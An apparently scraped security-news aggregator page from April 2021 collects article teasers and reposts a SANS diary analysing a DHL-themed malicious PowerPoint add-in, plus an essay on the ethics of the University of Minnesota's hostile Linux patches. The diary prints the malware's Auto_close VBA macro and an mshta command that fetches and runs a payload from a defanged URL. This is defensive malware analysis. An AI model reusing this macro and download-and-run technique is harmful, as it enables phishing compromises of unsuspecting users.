Malware Devil

Friday, April 23, 2021

Hackers Exploit VPN to Deploy SUPERNOVA malware on SolarWinds Orion

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed details of a new advanced persistent threat (APT) that’s leveraging the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a connection to a Pulse Secure VPN device.
“The threat actor connected to the entity’s network via a Pulse Secure virtual private network (
Read More

The post Hackers Exploit VPN to Deploy SUPERNOVA malware on SolarWinds Orion appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/hackers-exploit-vpn-to-deploy-supernova-malware-on-solarwinds-orion/?utm_source=rss&utm_medium=rss&utm_campaign=hackers-exploit-vpn-to-deploy-supernova-malware-on-solarwinds-orion

ESET Protects Your Online Reality

The post ESET Protects Your Online Reality appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/eset-protects-your-online-reality/?utm_source=rss&utm_medium=rss&utm_campaign=eset-protects-your-online-reality

The Cyber Security Buffs: March 2021 Edition

Cyber Security Buffs conducted a webinar on 25th March 2021. This webinar was focused on how the increase in cyber criminal activities is

The post The Cyber Security Buffs: March 2021 Edition appeared first on Kratikal Blog.

The post The Cyber Security Buffs: March 2021 Edition appeared first on Security Boulevard.

Read More

The post The Cyber Security Buffs: March 2021 Edition appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/the-cyber-security-buffs-march-2021-edition/?utm_source=rss&utm_medium=rss&utm_campaign=the-cyber-security-buffs-march-2021-edition

Remote Debuggers as an Attack Vector

Over the course of the past year, our team added many new checks to the Acunetix scanner. Several of these checks were related to the debug modes of web applications as well as components/panels used for debugging. These debug modes and components/panels often have misconfigurations,…

Read more

The post Remote Debuggers as an Attack Vector appeared first on Acunetix.

The post Remote Debuggers as an Attack Vector appeared first on Security Boulevard.

Read More

The post Remote Debuggers as an Attack Vector appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/remote-debuggers-as-an-attack-vector/?utm_source=rss&utm_medium=rss&utm_campaign=remote-debuggers-as-an-attack-vector

Best Practices for Securing Modern Applications

As the COVID-19 pandemic took over the world, more and more businesses rushed to the cloud without taking into consideration the security issues that could result from rapid deployment. There is no doubt that moving to the cloud has a wealth of benefits. However, it is a complex process and if security best practices are..

The post Best Practices for Securing Modern Applications appeared first on Security Boulevard.

Read More

The post Best Practices for Securing Modern Applications appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/best-practices-for-securing-modern-applications/?utm_source=rss&utm_medium=rss&utm_campaign=best-practices-for-securing-modern-applications

TikTok Sued Over Data Collection of Minors | Avast

Former children’s commissioner of England Anne Longfield is suing TikTok on behalf of millions of children in the UK over data collection that Longfield maintains is without sufficient warning and transparency. According to BBC News, the claim covers all children who have used the popular video-sharing app since May 2018. Children wishing not to be represented can opt out, but if Longfield is successful, each child affected could be owed thousands of pounds. The collected data in question includes phone numbers, videos, exact location, and biometric information of each child. TikTok, owned by Chinese company ByteDance, issued a statement saying, “We believe the claims lack merit and intend to vigorously defend the action.”

The post TikTok Sued Over Data Collection of Minors | Avast appeared first on Security Boulevard.

Read More

The post TikTok Sued Over Data Collection of Minors | Avast appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/tiktok-sued-over-data-collection-of-minors-avast/?utm_source=rss&utm_medium=rss&utm_campaign=tiktok-sued-over-data-collection-of-minors-avast

IDC In Conversation – Security Operations Strategy: The Fundamentals to Achieving Cyber Resilience and Efficacy

Cathy Huang, Associate Research Director of IDC Asia/Pacific’s (AP) Services and Security Practice, caught up with Joanne Wong and Leonardo Hutabarat, to discuss the role and differentiation of security operations platforms and how it drives the overall enterprise security efficacy…

The post IDC In Conversation – Security Operations Strategy: The Fundamentals to Achieving Cyber Resilience and Efficacy appeared first on LogRhythm.

The post IDC In Conversation – Security Operations Strategy: The Fundamentals to Achieving Cyber Resilience and Efficacy appeared first on Security Boulevard.

Read More

The post IDC In Conversation – Security Operations Strategy: The Fundamentals to Achieving Cyber Resilience and Efficacy appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/idc-in-conversation-security-operations-strategy-the-fundamentals-to-achieving-cyber-resilience-and-efficacy/?utm_source=rss&utm_medium=rss&utm_campaign=idc-in-conversation-security-operations-strategy-the-fundamentals-to-achieving-cyber-resilience-and-efficacy

When a Ripple Becomes a Wave: Cyberattack Fallout

The exploitation of Microsoft Exchange Server made headlines earlier this year, sending security teams scrambling to patch their servers before malicious actors had a chance to compromise their system. According to Microsoft, they have attributed the attack to a group called Hafnium, which they describe as a being “state sponsored and operating out of China.”..

The post When a Ripple Becomes a Wave: Cyberattack Fallout appeared first on Security Boulevard.

Read More

The post When a Ripple Becomes a Wave: Cyberattack Fallout appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/when-a-ripple-becomes-a-wave-cyberattack-fallout/?utm_source=rss&utm_medium=rss&utm_campaign=when-a-ripple-becomes-a-wave-cyberattack-fallout

Ninth Circuit Says Demand for Cyberinsurance Payment not a “Claim”

One of the more common forms of cyberattack is that of a business email compromise (BEC) – when the email account of either a buyer or seller (or both) is compromised by a hacker who then spoofs one or both of the parties to demand or redirect payments intended to occur between the parties to..

The post Ninth Circuit Says Demand for Cyberinsurance Payment not a “Claim” appeared first on Security Boulevard.

Read More

The post Ninth Circuit Says Demand for Cyberinsurance Payment not a “Claim” appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/ninth-circuit-says-demand-for-cyberinsurance-payment-not-a-claim/?utm_source=rss&utm_medium=rss&utm_campaign=ninth-circuit-says-demand-for-cyberinsurance-payment-not-a-claim

Malicious PowerPoint Add-On: “Small Is Beautiful”, (Fri, Apr 23rd)

Yesterday I spotted a DHL-branded phishing campaign that used a PowerPoint file to compromise the victim. The malicious attachment is a PowerPoint add-in. This technique is not new, I already analyzed such a sample in a previous diary[1]. The filename is “dhl-shipment-notification-6207428452.ppt” (SHA256:934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341) and has a VT score of 18/60[2].

The main feature of this file could be described as “small is beautiful”. A very small VBA macro is present in the file:

remnux@remnux:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt
1: 444 ‘x05DocumentSummaryInformation’
2: 43736 ‘x05SummaryInformation’
3: 535 ‘PROJECT’
4: 44 ‘PROJECTwm’
5: M 1482 ‘VBA/Module111’
6: 3231 ‘VBA/_VBA_PROJECT’
7: 1886 ‘VBA/__SRP_0’
8: 142 ‘VBA/__SRP_1’
9: 260 ‘VBA/__SRP_2’
10: 103 ‘VBA/__SRP_3’
11: 382 ‘VBA/__SRP_4’
12: 66 ‘VBA/__SRP_5’
13: 768 ‘VBA/dir’
14: m 1377 ‘VBA/sex’
15: 97 ‘sex/x01CompObj’
16: 286 ‘sex/x03VBFrame’
17: 90 ‘sex/f’
18: 115 ‘sex/i01/x01CompObj’
19: 220 ‘sex/i01/f’
20: 110 ‘sex/i01/i03/x01CompObj’
21: 40 ‘sex/i01/i03/f’
22: 0 ‘sex/i01/i03/o’
23: 110 ‘sex/i01/i04/x01CompObj’
24: 40 ‘sex/i01/i04/f’
25: 0 ‘sex/i01/i04/o’
26: 148 ‘sex/i01/o’
27: 48 ‘sex/i01/x’
28: 0 ‘sex/o’

The macro is so simple but effective:

remnux@remnux:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 5 -v
Attribute VB_Name = “Module111”
Sub _
Auto_close()
Dim k As New sex
Shell sex.krnahai.bachikyasath.Tag
End Sub

The macro will be executed when the document is closed and refers to an object “sex”. You can see many references to this string in the first oledump output. This is a Microsoft Form:

remnux@remnux:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 15
00000000: 01 00 FE FF 03 0A 00 00 FF FF FF FF 00 00 00 00 …………….
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 …………….
00000020: 4D 69 63 72 6F 73 6F 66 74 20 46 6F 72 6D 73 20 Microsoft Forms
00000030: 32 2E 30 20 46 6F 72 6D 00 10 00 00 00 45 6D 62 2.0 Form…..Emb
00000040: 65 64 64 65 64 20 4F 62 6A 65 63 74 00 00 00 00 edded Object….
00000050: 00 F4 39 B2 71 00 00 00 00 00 00 00 00 00 00 00 ..9.q………..
00000060: 00

You could try to load the add-in and check the form with PowerPoint (in a sandbox!) but, most of the time, just extracting strings will do the job. Let’s search for the property “bachikyasath”:

remnux@remnux:/MalwareZoo/20210422$ strings dhl-shipment-notification-6207428452.ppt |
  grep -A 3 -B 3 bachikyasath
sexr
UserFormN
krnahai
bachikyasath<”
Tag&
merilaylo
Attribut

Tab4
Tahoma
Page1a
bachikyasath”mshta””hxxps://j[.]mp/hdjkashdjkahs”
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1

The macro just spawns a shell that executes the Microsoft tool “mshta.exe” which will download and execute the payload from hxxps://j[.]mp/hdjkashdjkahs

Unfortunately, this URL points to blogspot.com page and I was not able to grab the payload. I searched on VT and found that the same file was uploaded one day before and received a score of 0/60! (SHA256:ff1683773ad9b57473e5206023b5ef2eca5b51572bffa7b9e0559408e3e41424)

 

[1] https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162
[2] https://bazaar.abuse.ch/sample/934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post Malicious PowerPoint Add-On: “Small Is Beautiful”, (Fri, Apr 23rd) appeared first on Malware Devil.



https://malwaredevil.com/2021/04/23/malicious-powerpoint-add-on-small-is-beautiful-fri-apr-23rd/?utm_source=rss&utm_medium=rss&utm_campaign=malicious-powerpoint-add-on-small-is-beautiful-fri-apr-23rd

Thursday, April 22, 2021

7 Ways Policy as Code Can Improve Automation and Security

What is Policy as Code? From startups to large organizations, handbook-based policy management rarely scales well and is often applied in a non-uniform way. Policy …

The post 7 Ways Policy as Code Can Improve Automation and Security appeared first on Cyral.

The post 7 Ways Policy as Code Can Improve Automation and Security appeared first on Security Boulevard.

Read More

The post 7 Ways Policy as Code Can Improve Automation and Security appeared first on Malware Devil.



https://malwaredevil.com/2021/04/22/7-ways-policy-as-code-can-improve-automation-and-security/?utm_source=rss&utm_medium=rss&utm_campaign=7-ways-policy-as-code-can-improve-automation-and-security

HAFNIUM Exploits Live On

The Prometei Botnet is not new. Like most malware and exploits, it continues to adapt and change over time. What is concerning is what is happening now. Our latest research demonstrates  how Prometei has evolved and reveals that current versions of Prometei are now exploiting some of the vulnerabilities in Microsoft Exchange that were part of the recent HAFNIUM attacks. We will continue to deal with lingering effects from these specific Microsoft Exchange vulnerabilities, but—more importantly—we will continue to deal with vulnerabilities in general and that requires a better approach to cybersecurity.

The post HAFNIUM Exploits Live On appeared first on Security Boulevard.

Read More

The post HAFNIUM Exploits Live On appeared first on Malware Devil.



https://malwaredevil.com/2021/04/22/hafnium-exploits-live-on/?utm_source=rss&utm_medium=rss&utm_campaign=hafnium-exploits-live-on

Spotlight on the Cybercriminal Supply Chains

In this Threatpost podcast Fortinet’s top researcher outlines what a cybercriminal supply chain is and how much the illicit market is worth.
Read More

The post Spotlight on the Cybercriminal Supply Chains appeared first on Malware Devil.



https://malwaredevil.com/2021/04/22/spotlight-on-the-cybercriminal-supply-chains/?utm_source=rss&utm_medium=rss&utm_campaign=spotlight-on-the-cybercriminal-supply-chains

Wednesday, April 21, 2021

Pulse Secure April Attack

Read More

The post Pulse Secure April Attack appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/pulse-secure-april-attack-2/?utm_source=rss&utm_medium=rss&utm_campaign=pulse-secure-april-attack-2

Open letter to the research community

Read More

The post Open letter to the research community appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/open-letter-to-the-research-community-2/?utm_source=rss&utm_medium=rss&utm_campaign=open-letter-to-the-research-community-2

[Homebrew] critical – Broken parsing of Git diff allows an attacker to inject arbitrary Ruby scripts to Casks on official taps

Read More

The post [Homebrew] critical – Broken parsing of Git diff allows an attacker to inject arbitrary Ruby scripts to Casks on official taps appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/homebrew-critical-broken-parsing-of-git-diff-allows-an-attacker-to-inject-arbitrary-ruby-scripts-to-casks-on-official-taps-2/?utm_source=rss&utm_medium=rss&utm_campaign=homebrew-critical-broken-parsing-of-git-diff-allows-an-attacker-to-inject-arbitrary-ruby-scripts-to-casks-on-official-taps-2

Vulnerability Spotlight: Code execution vulnerabilities in PrusaSlicer

Read More

The post Vulnerability Spotlight: Code execution vulnerabilities in PrusaSlicer appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/vulnerability-spotlight-code-execution-vulnerabilities-in-prusaslicer-2/?utm_source=rss&utm_medium=rss&utm_campaign=vulnerability-spotlight-code-execution-vulnerabilities-in-prusaslicer-2

How we fought bad apps and developers in 2020

Read More

The post How we fought bad apps and developers in 2020 appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/how-we-fought-bad-apps-and-developers-in-2020-2/?utm_source=rss&utm_medium=rss&utm_campaign=how-we-fought-bad-apps-and-developers-in-2020-2

Ethics: University of Minnesota’s hostile patches

The University of Minnesota (UMN) got into trouble this week for doing a study where they have submitted deliberately vulnerable patches into open-source projects, in order to test whether hostile actors can do this to hack things. After a UMN researcher submitted a crappy patch to the Linux Kernel, kernel maintainers decided to rip out all recent UMN patches.

Both things can be true:

Their study was an important contribution to the field of cybersecurity.
Their study was unethical.

It’s like Nazi medical research on victims in concentration camps, or U.S. military research on unwitting soldiers. The research can simultaneously be wildly unethical but at the same time produce useful knowledge.
I’d agree that their paper is useful. I would not be able to immediately recognize their patches as adding a vulnerability — and I’m an expert at such things.
In addition, the sorts of bugs it exploits shows a way forward in the evolution of programming languages. It’s not clear that a “safe” language like Rust would be the answer. Linux kernel programming requires tracking resources in ways that Rust would consider inherently “unsafe”. Instead, the C language needs to evolve with better safety features and better static analysis. Specifically, we need to be able to annotate the parameters and return statements from functions. For example, if a pointer can’t be NULL, then it needs to be documented as a non-nullable pointer. (Imagine if pointers could be signed and unsigned, meaning, can sometimes be NULL or never be NULL).
So I’m glad this paper exists. As a researcher, I’ll likely cite it in the future. As a programmer, I’ll be more vigilant in the future. In my own open-source projects, I should probably review some previous pull requests that I’ve accepted, since many of them have been the same crappy quality of simply adding a (probably) unnecessary NULL-pointer check.
The next question is whether this is ethical. Well, the paper claims to have sign-off from their university’s IRB — their Institutional Review Board that reviews the ethics of experiments. Universities created IRBs to deal with the fact that many medical experiments were done on either unwilling or unwitting subjects, such as the Tuskegee Syphilis Study. All medical research must have IRB sign-off these days.
However, I think IRB sign-off for computer security research is stupid. Things like masscanning of the entire Internet are undecidable with traditional ethics. I regularly scan every device on the IPv4 Internet, including your own home router. If you paid attention to the packets your firewall drops, some of them would be from me. Some consider this a gross violation of basic ethics and get very upset that I’m scanning their computer. Others consider this to be the expected consequence of the end-to-end nature of the public Internet, that there’s an inherent social contract that you must be prepared to receive any packet from anywhere. Kerckhoff’s Principle from the 1800s suggests that core ethic of cybersecurity is exposure to such things rather than trying to cover them up.
The point isn’t to argue whether masscanning is ethical. The point is to argue that it’s undecided, and that your IRB isn’t going to be able to answer the question better than anybody else.
But here’s the thing about masscanning: I’m honest and transparent about it. My very first scan of the entire Internet came with a tweet “BTW, this is me scanning the entire Internet”.
A lot of ethical questions in other fields comes down to honesty. If you have to lie about it or cover it up, then there’s a good chance it’s unethical.
For example, the west suffers a lot of cyberattacks from Russia and China. Therefore, as a lone wolf actor capable of hacking them back, is it ethical to do so? The easy answer is that when discovered, would you say “yes, I did that, and I’m proud of it”, or would you lie about it? I admit this is a difficult question, because it’s posed in terms of whether you’d want to evade the disapproval from other people, when the reality is that you might not want to get novichoked by Putin.
The above research is based on a lie. Lying has consequences.
The natural consequence here is that now that UMN did that study, none of the patches they submit can be trusted. It’s not just this one submitted patch. The kernel maintainers are taking scorched earth response, reverting all recent patches from the university and banning future patches from them. It may be a little hysterical, but at the same time, this is a new situation that no existing policy covers.
I partly disagree with the kernel maintainer’s conclusion that the patches “obviously were _NOT_ created by a static analysis tool”. This is exactly the sort of noise static analyzers have produced in the past. I reviewed the source file for how a static analyzer might come to this conclusion, and found it’s exactly the sort of thing it might produce.
But at the same time, it’s obviously noise and bad output. If the researcher were developing a static analyzer tool, they should understand that this is crap noise and bad output from the static analyzer. They should not be submitting low-quality patches like this one. The main concern that researchers need to focus on for static analysis isn’t increasing detection of vulns, but decreasing noise.
In other words, the debate here is whether the researcher is incompetent or dishonest. Given that UMN has practiced dishonesty in the past, it’s legitimate to believe they are doing so again. Indeed, “static analysis” research might also include research in automated ways to find subversive bugs. One might create a static analyzer to search code for ways to insert a NULL pointer check to add a vuln.
Now incompetence is actually a fine thing. That’s the point of research, is to learn things. Starting fresh without all the preconceptions of old work is also useful. That researcher has problems today, but a year or two from now they’ll be an ultra-competent expert in their field. That’s how one achieves competence — making mistakes, lots of them.
But either way, the Linux kernel maintainer response of “we are not part of your research project” is a valid. These patches are crap, regardless of which research project they are pursuing (static analyzer or malicious patch submissions).
Conclusion
I think the UMN research into bad-faith patches is useful to the community. I reject the idea that their IRB, which is focused on biomedical ethics rather than cybersecurity ethics, would be useful here. Indeed, it’s done the reverse: IRB approval has tainted the entire university with the problem rather than limiting the fallout to just the researchers that could’ve been disavowed.
The natural consequence of being dishonest is that people can’t trust you. In cybersecurity, trust is hard to win and easy to lose — and UMN lost it. The researchers should have understand that “dishonesty” was going to be a problem.
I’m not sure there is a way to ethically be dishonest, so I’m not sure how such useful research can be done without the researchers or sponsors being tainted by it. I just know that “dishonesty” is an easily recognizable issue in cybersecurity that needs to be avoided. If anybody knows how to be ethically dishonest, I’d like to hear it.
Update: This person proposes a way this research could be conducted to ethically be dishonest:

By asking the top boss if it’s okay if you lie to their team, a la an authorized penetration test.

In this case that might still not be ethical, because while the top guy can answer for the /project/ he can’t answer for the other /people/, who are volunteers and not employees.

— Random of Eddie (@random_eddie) April 21, 2021

The post Ethics: University of Minnesota’s hostile patches appeared first on Security Boulevard.

Read More

The post Ethics: University of Minnesota’s hostile patches appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/ethics-university-of-minnesotas-hostile-patches/?utm_source=rss&utm_medium=rss&utm_campaign=ethics-university-of-minnesotas-hostile-patches

Rapid7 Acquires Velociraptor Open Source Project

The company plans to use Velociraptor’s technology and insights to build out its own incident response capabilities.

The post Rapid7 Acquires Velociraptor Open Source Project appeared first on Malware Devil.



https://malwaredevil.com/2021/04/21/rapid7-acquires-velociraptor-open-source-project/?utm_source=rss&utm_medium=rss&utm_campaign=rapid7-acquires-velociraptor-open-source-project

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...